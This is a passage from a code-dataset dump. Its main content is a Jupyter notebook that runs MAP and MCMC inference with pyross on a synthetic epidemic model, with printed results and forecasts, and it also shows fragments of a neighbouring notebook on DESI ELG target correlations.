15.02it/s]\n100%|██████████| 2000/2000 [01:34<00:00, 21.17it/s]\n100%|██████████| 2000/2000 [01:38<00:00, 20.31it/s]\n100%|██████████| 2000/2000 [01:36<00:00, 20.79it/s]\n100%|██████████| 2000/2000 [01:35<00:00, 21.02it/s]\n100%|██████████| 2000/2000 [01:41<00:00, 19.73it/s]\n100%|██████████| 2000/2000 [01:34<00:00, 21.08it/s]\n100%|██████████| 2000/2000 [01:44<00:00, 19.11it/s]\n100%|██████████| 2000/2000 [00:19<00:00, 104.63it/s]\n100%|██████████| 2000/2000 [00:16<00:00, 120.18it/s]\n100%|██████████| 2000/2000 [00:16<00:00, 118.26it/s]\n100%|██████████| 2000/2000 [00:17<00:00, 115.52it/s]\n100%|██████████| 2000/2000 [00:16<00:00, 121.23it/s]\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
hexsha: cb1be7953ddc781bfd7c45a8c383198eb5c09f73
size: 548,316
ext: ipynb
lang: Jupyter Notebook
max_stars_repo_path: SimpleTestModel/synthInfTest-pop1e6-win2.ipynb
max_stars_repo_name: rljack2002/infExampleCovidEW
max_stars_repo_head_hexsha: 351e0605c80a51a2cd285136d7a05d969ac6c6fd
max_stars_repo_licenses: [ "MIT" ]
max_stars_count: 2
max_stars_repo_stars_event_min_datetime: 2020-10-28T17:01:05.000Z
max_stars_repo_stars_event_max_datetime: 2020-10-30T11:07:20.000Z
max_issues_repo_path: SimpleTestModel/synthInfTest-pop1e6-win2.ipynb
max_issues_repo_name: rljack2002/infExampleCovidEW
max_issues_repo_head_hexsha: 351e0605c80a51a2cd285136d7a05d969ac6c6fd
max_issues_repo_licenses: [ "MIT" ]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: SimpleTestModel/synthInfTest-pop1e6-win2.ipynb
max_forks_repo_name: rljack2002/infExampleCovidEW
max_forks_repo_head_hexsha: 351e0605c80a51a2cd285136d7a05d969ac6c6fd
max_forks_repo_licenses: [ "MIT" ]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
avg_line_length: 512.924228
max_line_length: 149,068
alphanum_fraction: 0.938793
cells, cell_types, cell_type_groups:
[ [ [ "## inference in simple model using synthetic data\npopulation size 10^6, inference window 2x4 = 8 days, to be compared with ``-win5`` analogous notebook ", "_____no_output_____" ] ], [ [ "%env OMP_NUM_THREADS=1", "env: OMP_NUM_THREADS=1\n" ], [ "%matplotlib inline\nimport numpy as np\nimport os\nimport pickle\nimport pprint\nimport time\n\nimport pyross\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n#from matplotlib import rc; rc('text', usetex=True)\n\nimport synth_fns", "_____no_output_____" ] ], [ [ "(cell 3 was removed to hide local file info)\n### main settings", "_____no_output_____" ] ], [ [ "## for dataFiles : needs a fresh value in every notebook\nfileRoot = 'dataSynthInfTest-pop1e6-win2'\n\n## total population\npopN = 1e6\n\n## tau-leaping param, take this negative to force gillespie\n## or set a small value for high-accuracy tau-leap (eg 1e-4 or 1e-5)\nleapEps = -1\n\n## do we use small tolerances for the likelihood computations? (use False for debug etc)\nisHighAccuracy = True\n\n# absolute tolerance for logp for MAP \ninf_atol = 1.0\n\n## prior mean of beta, divided by true value (set to 1.0 for the simplest case)\nbetaPriorOffset = 0.8\nbetaPriorLogNorm = False\n\n## mcmc\nmcSamples = 5000\nnProcMCMC = 2 # None ## take None to use default but large numbers are not efficient in this example", "_____no_output_____" ], [ "trajSeed = 18\ninfSeed = 21\nmcSeed = infSeed+2\n\nloadTraj = False\nsaveMC = True", "_____no_output_____" ] ], [ [ "### model", "_____no_output_____" ] ], [ [ "model_dict = synth_fns.get_model(popN)\n\nmodel_spec = model_dict['mod']\ncontactMatrix = model_dict['CM']\nparameters_true = model_dict['params']\ncohortsM = model_dict['cohortsM']\nNi = model_dict['cohortsPop']", "_____no_output_____" ] ], [ [ "#### more settings", "_____no_output_____" ] ], [ [ "## total trajectory time (bare units)\nTf_bare = 20\n## total inf time\nTf_inf_bare = 2\n\n## inference period starts when the total deaths reach this amount (as a fraction)\nfracDeaths = 2e-3 # int(N*200/1e5)\n", "_____no_output_____" ], [ "## hack to get higher-frequency data\n## how many data points per \"timestep\" (in original units)\nfineData = 4\n\n## this assumes that all parameters are rates !!\nfor key in parameters_true:\n #print(key,parameters_true[key])\n parameters_true[key] /= fineData\n\nTf = Tf_bare * fineData; \nNf = Tf+1\n\nTf_inference = Tf_inf_bare * fineData\nNf_inference = Tf_inference+1", "_____no_output_____" ] ], [ [ "### plotting helper functions", "_____no_output_____" ] ], [ [ "def plotTraj(M,data_array,Nf_start,Tf_inference,fineData):\n fig = plt.figure(num=None, figsize=(6, 4), dpi=80, facecolor='w', edgecolor='k')\n #plt.rc('text', usetex=True)\n plt.rc('font', family='serif', size=12)\n t = np.linspace(0, Tf/fineData, Nf)\n\n # plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)\n plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)\n plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)\n plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)\n #plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)\n\n plt.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n plt.legend()\n plt.show()\n\n fig,axs = plt.subplots(1,2, figsize=(12, 5), dpi=80, facecolor='w', edgecolor='k')\n ax = axs[0]\n ax.plot(t[1:],np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)),'o-',label='death increments', lw=1)\n 
ax.legend(loc='upper right') ; # plt.show()\n\n ax = axs[1]\n ax.plot(t,np.sum(data_array[:, 3*M:4*M], axis=1),'o-',label='deaths',ms=3)\n ax.legend() ; \n\n plt.show()\n\n\ndef plotMAP(res,data_array,M,N,estimator,Nf_start,Tf_inference,fineData):\n print('**beta(bare units)',res['params_dict']['beta']*fineData)\n print('**logLik',res['log_likelihood'],'true was',logpTrue)\n print('\\n')\n print(res)\n\n fig,axs = plt.subplots(1,3, figsize=(15, 7), dpi=80, facecolor='w', edgecolor='k')\n plt.subplots_adjust(wspace=0.3)\n #plt.rc('text', usetex=True)\n plt.rc('font', family='serif', size=12)\n t = np.linspace(0, Tf/fineData, Nf)\n\n ax = axs[0]\n\n #plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)\n ax.plot(t, np.sum(data_array[:, M:2*M], axis=1), 'o', label='Exposed', lw=2)\n ax.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), 'o', label='Infected', lw=2)\n ax.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), 'o', label='Deaths', lw=2)\n #plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)\n\n tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData\n xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)\n #plt.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)\n ax.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', color='C0',label='E-MAP', lw=2, ms=3)\n ax.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', color='C1',label='I-MAP', lw=2, ms=3)\n ax.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', color='C2',label='D-MAP', lw=2, ms=3)\n #plt.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-o', label='R-MAP', lw=2)\n\n ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n ax.legend()\n\n ax = axs[1]\n ax.plot(t[1:], np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)), '-o', label='death incs', lw=2)\n ax.plot(tt[1:], np.diff(np.sum(xm[:, 3*M:4*M], axis=1)), '-x', label='MAP', lw=2, ms=3)\n ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n ax.legend()\n\n ax = axs[2]\n\n ax.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='Sus', lw=1.5, ms=3)\n #plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)\n #plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)\n #plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)\n ax.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=1.5, ms=3)\n\n #infResult = res\n tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData\n xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)\n ax.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)\n #plt.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', label='E-MAP', lw=2, ms=3)\n #plt.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', label='I-MAP', lw=2, ms=3)\n #plt.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', label='D-MAP', lw=2, ms=3)\n ax.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-x', label='R-MAP', lw=1.5, ms=3)\n\n ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')\n ax.legend()\n plt.show()\n \n\n \ndef plotMCtrace(selected_dims, sampler, numTrace=None):\n # Plot the trace for these dimensions:\n plot_dim = len(selected_dims)\n plt.rcParams.update({'font.size': 14})\n fig, axes = plt.subplots(plot_dim, figsize=(12, plot_dim), sharex=True)\n samples = sampler.get_chain()\n if numTrace == None : numTrace = np.shape(samples)[1] ## corrected index\n for ii,dd in enumerate(selected_dims):\n 
ax = axes[ii]\n ax.plot(samples[:, :numTrace , dd], \"k\", alpha=0.3)\n ax.set_xlim(0, len(samples))\n axes[-1].set_xlabel(\"step number\");\n plt.show(fig)\n plt.close()\n\ndef plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,\n infResult,parameters_true,trueInit) :\n ## used for prior pdfs\n (likFun,priFun,dimFlat) = pyross.evidence.latent_get_parameters(estimator,\n obsData, fltrDeath, Tf_inference,\n param_priors, init_priors, \n contactMatrix,\n #intervention_fun=interventionFn,\n tangent=False,\n )\n xVals = np.linspace(parameters_true['beta']*0.5,parameters_true['beta']*1.5,100)\n\n betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]\n plt.hist(betas,density=True,color='lightblue',label='posterior')\n yVal=2\n plt.plot([infResult['params_dict']['beta']],[2*yVal],'bs',label='MAP',ms=10)\n plt.plot([parameters_true['beta']],[yVal],'ro',label='true',ms=10)\n\n\n ## this is a bit complicated, it just finds the prior for beta from the infResult\n var='beta'\n jj = infResult['param_keys'].index(var)\n xInd = infResult['param_guess_range'][jj]\n #print(jj,xInd)\n pVals = []\n for xx in xVals :\n flatP = np.zeros( dimFlat )\n flatP[xInd] = xx\n pdfAll = np.exp( priFun.logpdf(flatP) )\n pVals.append( pdfAll[xInd] )\n plt.plot(xVals,pVals,color='darkgreen',label='prior')\n\n\n plt.xlabel(var)\n plt.ylabel('pdf')\n plt.legend()\n\n labs=['init S','init E','init I']\n nPanel=3\n fig,axs = plt.subplots(1,nPanel,figsize=(14,4))\n for ii in range(nPanel) : \n ax = axs[ii]\n yVal=1.0/popN\n xs = [ rr['x0'][ii] for rr in result_mcmc ]\n ax.hist(xs,color='lightblue',density=True)\n ax.plot([infResult['x0'][ii]],yVal,'bs',label='true')\n ax.plot([trueInit[ii]],yVal,'ro',label='true')\n\n\n ## this is a bit complicated, it just finds the prior for beta from the infResult\n ## axis ranges\n xMin = np.min(xs)*0.8\n xMax = np.max(xs)*1.2\n xVals = np.linspace(xMin,xMax,100)\n\n ## this ID is a negative number because the init params are the end of the 'flat' param array\n paramID = ii-nPanel \n pVals = []\n for xx in xVals :\n flatP = np.zeros( dimFlat )\n flatP[paramID] = xx\n pdfAll = np.exp( priFun.logpdf(flatP) )\n pVals.append( pdfAll[paramID] )\n ax.plot(xVals,pVals,color='darkgreen',label='prior')\n\n #plt.xlabel(var)\n ax.set_xlabel(labs[ii])\n ax.set_ylabel('pdf')\n ax.yaxis.set_ticklabels([])\n\n plt.show()\n", "_____no_output_____" ] ], [ [ "### synthetic data", "_____no_output_____" ] ], [ [ "if loadTraj :\n ipFile = fileRoot+'-stochTraj.npy'\n syntheticData = np.load(ipFile)\n print('loading trajectory from',ipFile)\nelse :\n ticTime = time.time()\n syntheticData = synth_fns.make_stochastic_traj(Tf,Nf,trajSeed,model_dict,leapEps)\n tocTime = time.time() - ticTime\n print('traj generation time',tocTime,'secs')\n\nnp.save(fileRoot+'-stochTraj.npy',syntheticData)\n\nNf_start = synth_fns.get_start_time(syntheticData, popN, fracDeaths)\nprint('inf starts at timePoint',Nf_start)", "{'beta': 0.035, 'gE': 0.35000000000000003, 'gR': 0.245, 'gD': 0.005, 'seed': 18}\ntraj generation time 41.87377667427063 secs\ninf starts at timePoint 27\n" ], [ "plotTraj(cohortsM,syntheticData,Nf_start,Tf_inference,fineData)", "_____no_output_____" ] ], [ [ "### basic inference (estimator) setup\n(including computation of likelihood for the true parameters)", "_____no_output_____" ] ], [ [ "[estimator,fltrDeath,obsData,trueInit] = synth_fns.get_estimator(isHighAccuracy,model_dict,syntheticData, popN, Nf_start, Nf_inference,)\n\n## compute log-likelihood of true 
params\nlogpTrue = -estimator.minus_logp_red(parameters_true, trueInit, obsData, fltrDeath, Tf_inference, \n contactMatrix, tangent=False)\nprint('**logLikTrue',logpTrue,'\\n')\n\nprint('death data\\n',obsData,'length',np.size(obsData),Nf_inference)", "setting high-accuracy for likelihood\n**logLikTrue -40.72311526408154 \n\ndeath data\n [[2365.]\n [2767.]\n [3313.]\n [3839.]\n [4438.]\n [5060.]\n [5722.]\n [6501.]\n [7253.]] length 9 9\n" ] ], [ [ "### priors", "_____no_output_____" ] ], [ [ "[param_priors,init_priors] = synth_fns.get_priors(model_dict,betaPriorOffset,betaPriorLogNorm,fracDeaths,estimator)\nprint('Prior Params:',param_priors)\nprint('Prior Inits:')\npprint.pprint(init_priors)\nprint('trueBeta',parameters_true['beta'])\nprint('trueInit',trueInit)", "Prior Params: {'beta': {'mean': 0.028000000000000004, 'std': 0.014000000000000002, 'bounds': [0.0001, 0.14], 'prior_fun': 'truncnorm'}}\nPrior Inits:\n{'independent': {'bounds': [[72000.0, 1000000.0],\n [10100.251257867601, 1010025.12578676],\n [7899.748742132397, 789974.8742132396]],\n 'fltr': array([ True, True, True, False]),\n 'mean': array([720000. , 101002.51257868, 78997.48742132]),\n 'prior_fun': 'truncnorm',\n 'std': array([33667.50419289, 33667.50419289, 26332.49580711])}}\ntrueBeta 0.035\ntrueInit [709875. 87267. 80333. 2365.]\n" ] ], [ [ "### inference (MAP)", "_____no_output_____" ] ], [ [ "infResult = synth_fns.do_inf(estimator, obsData, fltrDeath, syntheticData, \n popN, Tf_inference, infSeed, param_priors,init_priors, model_dict, inf_atol)", "Starting global minimisation ...\n(32_w,64)-aCMA-ES (mu_w=17.6,w_1=11%) in dimension 4 (seed=21, Sat May 1 13:03:38 2021)\nIterat #Fevals function value axis ratio sigma min&max std t[m:s]\n 1 64 7.704383942908420e+01 1.0e+00 1.00e+00 1e-02 3e+04 0:01.6\n 2 128 7.252563298872531e+01 1.8e+00 9.68e-01 9e-03 4e+04 0:03.1\n 3 192 7.163917093426959e+01 3.1e+00 8.23e-01 6e-03 3e+04 0:04.7\n 5 320 7.096383466301374e+01 7.6e+00 6.61e-01 3e-03 2e+04 0:07.8\n 8 512 7.090657777596969e+01 1.6e+01 6.43e-01 2e-03 1e+04 0:12.5\n 12 768 7.080727508881648e+01 2.2e+01 4.26e-01 3e-04 3e+03 0:18.7\n 15 960 7.080598224196227e+01 2.0e+01 3.49e-01 1e-04 1e+03 0:23.4\nOptimal value (global minimisation): 70.80598224196227\nStarting local minimisation...\nOptimal value (local minimisation): 70.80582259847648\n" ], [ "#pprint.pprint(infResult)\nprint('MAP likelihood',infResult['log_likelihood'],'true',logpTrue)\nprint('MAP beta',infResult['params_dict']['beta'],'true',parameters_true['beta'])", "MAP likelihood -40.347160920804455 true -40.72311526408154\nMAP beta 0.03188011492363837 true 0.035\n" ] ], [ [ "### plot MAP trajectory", "_____no_output_____" ] ], [ [ "plotMAP(infResult,syntheticData,cohortsM,popN,estimator,Nf_start,Tf_inference,fineData)", "**beta(bare units) 0.12752045969455347\n**logLik -40.347160920804455 true was -40.72311526408154\n\n\n{'params_dict': {'beta': 0.03188011492363837, 'gE': 0.35000000000000003, 'gR': 0.245, 'gD': 0.005, 'seed': 18}, 'x0': array([725209.60575166, 101859.7992907 , 76606.06026326, 2365. 
]), 'flat_params': array([3.18801149e-02, 7.25209606e+05, 1.01859799e+05, 7.66060603e+04]), 'log_posterior': -70.80582259847648, 'log_prior': -30.458661677672026, 'log_likelihood': -40.347160920804455, 'param_keys': ['beta'], 'param_guess_range': [0], 'is_scale_parameter': [False], 'param_length': 1, 'scaled_param_guesses': [], 'init_flags': [False, True], 'init_fltrs': [None, array([[1., 0., 0., 0.],\n [0., 1., 0., 0.],\n [0., 0., 1., 0.]])], 'prior': <pyross.utils_python.Prior object at 0x7f612484fe50>}\n" ] ], [ [ "#### slice of likelihood \n(note this is not the posterior, hence MAP is not exactly at the peak)", "_____no_output_____" ] ], [ [ "## range for beta (relative to MAP)\nrangeParam = 0.1\n[bVals,likVals] = synth_fns.sliceLikelihood(rangeParam,infResult,\n estimator,obsData,fltrDeath,contactMatrix,Tf_inference)\n\n#print('logLiks',likVals,logp)\nplt.plot(bVals , likVals, 'o-')\nplt.plot(infResult['params_dict']['beta'],infResult['log_likelihood'],'s',ms=6)\nplt.show()", "_____no_output_____" ] ], [ [ "### MCMC", "_____no_output_____" ] ], [ [ "sampler = synth_fns.do_mcmc(mcSamples, nProcMCMC, estimator, Tf_inference, infResult, \n obsData, fltrDeath, param_priors, init_priors, \n model_dict,infSeed)", "est map [3.18801149e-02 7.25209606e+05 1.01859799e+05 7.66060603e+04] 4\n" ], [ "plotMCtrace([0,2,3], sampler)\nresult_mcmc = synth_fns.load_mcmc_result(estimator, obsData, fltrDeath, sampler, param_priors, init_priors, model_dict)\n\nprint('result shape',np.shape(result_mcmc))\nprint('last sample\\n',result_mcmc[-1])", "_____no_output_____" ] ], [ [ "#### save the result", "_____no_output_____" ] ], [ [ "if saveMC :\n opFile = fileRoot + \"-mcmc.pik\"\n print('opf',opFile)\n with open(opFile, 'wb') as f: \n pickle.dump([infResult,result_mcmc],f)", "opf dataSynthInfTest-pop1e6-win2-mcmc.pik\n" ] ], [ [ "#### estimate MCMC autocorrelation", "_____no_output_____" ] ], [ [ "# these are the estimated autocorrelation times for the sampler\n# (it likes runs ~50 times longer than this...)\npp = sampler.get_log_prob()\nnSampleTot = np.shape(pp)[0]\n#print('correl',sampler.get_autocorr_time(discard=int(nSampleTot/3)))\nprint('nSampleTot',nSampleTot)", "nSampleTot 5000\n" ] ], [ [ "#### plot posterior distributions", "_____no_output_____" ] ], [ [ "plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,\n infResult,parameters_true,trueInit)\n", "_____no_output_____" ] ], [ [ "### analyse posterior for beta", "_____no_output_____" ] ], [ [ "betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]\npostMeanBeta = np.mean(betas)\npostStdBeta = np.std(betas)\npostCIBeta = [ np.percentile(betas,2.5) , np.percentile(betas,97.5)]\n\nprint(\"beta: true {b:.5f} MAP {m:.5f}\".format(b=parameters_true['beta'],m=infResult['params_dict']['beta']))\nprint(\"post: mean {m:.5f} std {s:.5f} CI95: {l:.5f} {u:.5f}\".format(m=postMeanBeta,\n s=postStdBeta,\n l=postCIBeta[0],u=postCIBeta[1]))\n\n", "beta: true 0.03500 MAP 0.03188\npost: mean 0.03242 std 0.00305 CI95: 0.02698 0.03879\n" ] ], [ [ "### posterior correlations for initial conditions", "_____no_output_____" ] ], [ [ "sis = np.array( [ rr['x0'][0] for rr in result_mcmc ] )/popN\neis = np.array( [ rr['x0'][1] for rr in result_mcmc ] )/popN\niis = np.array( [ rr['x0'][2] for rr in result_mcmc ] )/popN\nbetas = [ rr['params_dict']['beta'] for rr in result_mcmc ]\n\nfig,axs = plt.subplots(1,3,figsize=(15,4))\nplt.subplots_adjust(wspace=0.35)\n\nax = 
axs[0]\n\nax.plot(eis,iis,'o',ms=2)\nax.set_xlabel('E0')\nax.set_ylabel('I0')\n\nax = axs[1]\n\nax.plot(1-eis-iis-sis,sis,'o',ms=2)\nax.set_ylabel('S0')\nax.set_xlabel('R0')\n\nax = axs[2]\nax.plot(1-eis-iis-sis,betas,'o',ms=2)\nax.set_ylabel('beta')\nax.set_xlabel('R0')\n\nplt.show()", "_____no_output_____" ], [ "def forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference, estimator, obs, fltr, contactMatrix):\n trajs = []\n #x = (data_array[Nf_start:Nf_start+Nf_inference])\n #obs=np.einsum('ij,kj->ki', fltr, x)\n\n # this should pick up the right number of traj, equally spaced\n totSamples = len(result_mcmc)\n skip = int(totSamples/nsamples)\n modulo = totSamples % skip\n #print(modulo,skip)\n \n for sample_res in result_mcmc[modulo::skip]: \n endpoints = estimator.sample_endpoints(obs, fltr, Tf_inference, sample_res, 1, contactMatrix=contactMatrix)\n xm = estimator.integrate(endpoints[0], Nf_start+Tf_inference, Tf, Nf-Tf_inference-Nf_start, dense_output=False)\n trajs.append(xm)\n\n return trajs \n\ndef plot_forecast(allTraj, data_array, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, M,\n estimator, obs, contactMatrix):\n #x = (data_array[Tf_start:Tf_start+Nf_inference]).astype('float') \n #obs=np.einsum('ij,kj->ki', fltr, x)\n \n #samples = estimator.sample_endpoints(obs, fltr, Tf_inference, res, nsamples, contactMatrix=contactMatrix)\n time_points = np.linspace(0, Tf, Nf)\n\n fig = plt.figure(num=None, figsize=(10, 8), dpi=80, facecolor='w', edgecolor='k')\n plt.rcParams.update({'font.size': 22})\n #for x_start in samples: \n for traj in allTraj: \n #xm = estimator.integrate(x_start, Tf_start+Tf_inference, Tf, Nf-Tf_inference-Tf_start, dense_output=False)\n # plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, M:2*M], axis=1), color='grey', alpha=0.1)\n # plt.plot(time_points[Tf_inference+Tf_start:], np.sum(xm[:, 2*M:3*M], axis=1), color='grey', alpha=0.1)\n \n incDeaths = np.diff( np.sum(traj[:, 3*M:4*M], axis=1) )\n \n plt.plot(time_points[1+Tf_inference+Nf_start:], incDeaths, color='grey', alpha=0.2)\n\n # plt.plot(time_points, np.sum(data_array[:, M:2*M], axis=1), label='True E')\n # plt.plot(time_points, np.sum(data_array[:, 2*M:3*M], axis=1), label='True I')\n \n incDeathsObs = np.diff( np.sum(data_array[:, 3*M:4*M], axis=1) )\n\n plt.plot(time_points[1:],incDeathsObs, 'ko', label='True D')\n plt.axvspan(Nf_start, Tf_inference+Nf_start, \n label='Used for inference',\n alpha=0.3, color='dodgerblue')\n plt.xlim([0, Tf])\n plt.legend() \n plt.show()", "_____no_output_____" ], [ "nsamples = 40\nforeTraj = forecast(result_mcmc, nsamples, Nf_start, Tf_inference, Nf_inference, \n estimator, obsData, fltrDeath, contactMatrix)\nprint(len(foreTraj))\n\nforeTraj = np.array( foreTraj )\nnp.save(fileRoot+'-foreTraj.npy',foreTraj)", "40\n" ], [ "plot_forecast(foreTraj, syntheticData, nsamples, Tf,Nf, Nf_start, Tf_inference, Nf_inference, cohortsM,\n estimator, obsData, contactMatrix)", "_____no_output_____" ], [ "print(Nf_inference)", "9\n" ], [ "print(len(result_mcmc))", "528\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
hexsha: cb1c03ba9653d63e42b90575bfede0eadf304b51
size: 938,131
ext: ipynb
lang: Jupyter Notebook
max_stars_repo_path: Sandbox/ELGgalforeground.ipynb
max_stars_repo_name: echaussidon/LSS
max_stars_repo_head_hexsha: 205ce48a288acacbd41358e6d0215f4aff355049
max_stars_repo_licenses: [ "BSD-3-Clause" ]
max_stars_count: 8
max_stars_repo_stars_event_min_datetime: 2017-04-12T14:52:26.000Z
max_stars_repo_stars_event_max_datetime: 2022-01-04T08:54:18.000Z
max_issues_repo_path: Sandbox/ELGgalforeground.ipynb
max_issues_repo_name: echaussidon/LSS
max_issues_repo_head_hexsha: 205ce48a288acacbd41358e6d0215f4aff355049
max_issues_repo_licenses: [ "BSD-3-Clause" ]
max_issues_count: 13
max_issues_repo_issues_event_min_datetime: 2017-10-26T22:06:24.000Z
max_issues_repo_issues_event_max_datetime: 2022-03-31T15:29:06.000Z
max_forks_repo_path: Sandbox/ELGgalforeground.ipynb
max_forks_repo_name: echaussidon/LSS
max_forks_repo_head_hexsha: 205ce48a288acacbd41358e6d0215f4aff355049
max_forks_repo_licenses: [ "BSD-3-Clause" ]
max_forks_count: 13
max_forks_repo_forks_event_min_datetime: 2015-10-26T17:30:10.000Z
max_forks_repo_forks_event_max_datetime: 2022-02-22T09:24:38.000Z
avg_line_length: 296.314277
max_line_length: 85,224
alphanum_fraction: 0.919926
cells:
[ [ [ "'''\nNotebook to specifically study correlations between ELG targets and Galactic foregrounds\n\nMuch of this made possible and copied from script shared by Anand Raichoor\n\nRun in Python 3; install pymangle, fitsio, healpy locally: pip install --user fitsio; pip install --user healpy; git clone https://github.com/esheldon/pymangle...\n\n'''\n\nimport fitsio\nimport numpy as np\n#from desitarget.io import read_targets_in_hp, read_targets_in_box, read_targets_in_cap\nimport astropy.io.fits as fits\nimport glob\nimport os\nimport healpy as hp\nfrom matplotlib import pyplot as plt\n", "_____no_output_____" ], [ "print(nest)", "True\n" ], [ "#Some information is in pixelized map\n#get nside and nest from header\npixfn = '/project/projectdirs/desi/target/catalogs/dr8/0.31.1/pixweight/pixweight-dr8-0.31.1.fits'\nhdr = fits.getheader(pixfn,1)\nnside,nest = hdr['HPXNSIDE'],hdr['HPXNEST']\nprint(fits.open(pixfn)[1].columns.names)\nhpq = fitsio.read(pixfn)", "['HPXPIXEL', 'FRACAREA', 'STARDENS', 'EBV', 'PSFDEPTH_G', 'PSFDEPTH_R', 'PSFDEPTH_Z', 'GALDEPTH_G', 'GALDEPTH_R', 'GALDEPTH_Z', 'PSFDEPTH_W1', 'PSFDEPTH_W2', 'PSFSIZE_G', 'PSFSIZE_R', 'PSFSIZE_Z', 'ELG', 'LRG', 'QSO', 'BGS_ANY', 'MWS_ANY', 'ALL', 'STD_FAINT', 'STD_BRIGHT', 'LRG_1PASS', 'LRG_2PASS', 'BGS_FAINT', 'BGS_BRIGHT', 'BGS_WISE', 'MWS_BROAD', 'MWS_MAIN_RED', 'MWS_MAIN_BLUE', 'MWS_WD', 'MWS_NEARBY']\n" ], [ "#get MC efficiency\nmcf = fitsio.read(os.getenv('SCRATCH')+'/ELGMCeffHSCHP.fits')\nmmc = np.mean(mcf['EFF'])\nmcl = np.zeros(12*nside*nside)\nfor i in range(0,len(mcf)):\n pix = mcf['HPXPIXEL'][i]\n mcl[pix] = mcf['EFF'][i]/mmc", "_____no_output_____" ], [ "#ELGs were saved here\nelgf = os.getenv('SCRATCH')+'/ELGtargetinfo.fits'", "_____no_output_____" ], [ "#for healpix\ndef radec2thphi(ra,dec):\n return (-dec+90.)*np.pi/180.,ra*np.pi/180.", "_____no_output_____" ], [ "#read in ELGs, put them into healpix\nfelg = fitsio.read(elgf)\ndth,dphi = radec2thphi(felg['RA'],felg['DEC'])\ndpix = hp.ang2pix(nside,dth,dphi,nest)", "_____no_output_____" ], [ "lelg = len(felg)\nprint(lelg)", "47256516\n" ], [ "#full random file is available, easy to read some limited number; take 1.5x ELG to start with\nrall = fitsio.read('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',rows=np.arange(int(1.5*lelg))\n )\nrall_header = fitsio.read_header('/project/projectdirs/desi/target/catalogs/dr8/0.31.0/randomsall/randoms-inside-dr8-0.31.0-all.fits',ext=1)", "_____no_output_____" ], [ "#cut randoms to ELG footprint\nkeep = (rall['NOBS_G']>0) & (rall['NOBS_R']>0) & (rall['NOBS_Z']>0)\nprint(len(rall[keep]))\nelgbits = [1,5,6,7,11,12,13]\nkeepelg = keep\nfor bit in elgbits:\n keepelg &= ((rall['MASKBITS'] & 